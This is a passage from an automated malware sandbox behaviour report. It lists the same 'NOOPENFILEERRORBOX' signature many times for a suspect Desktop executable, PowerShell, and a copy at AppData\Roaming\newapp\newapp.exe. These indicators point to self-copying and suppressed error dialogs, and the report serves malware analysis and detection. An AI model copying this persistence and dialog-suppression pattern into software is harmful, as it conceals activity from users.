                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
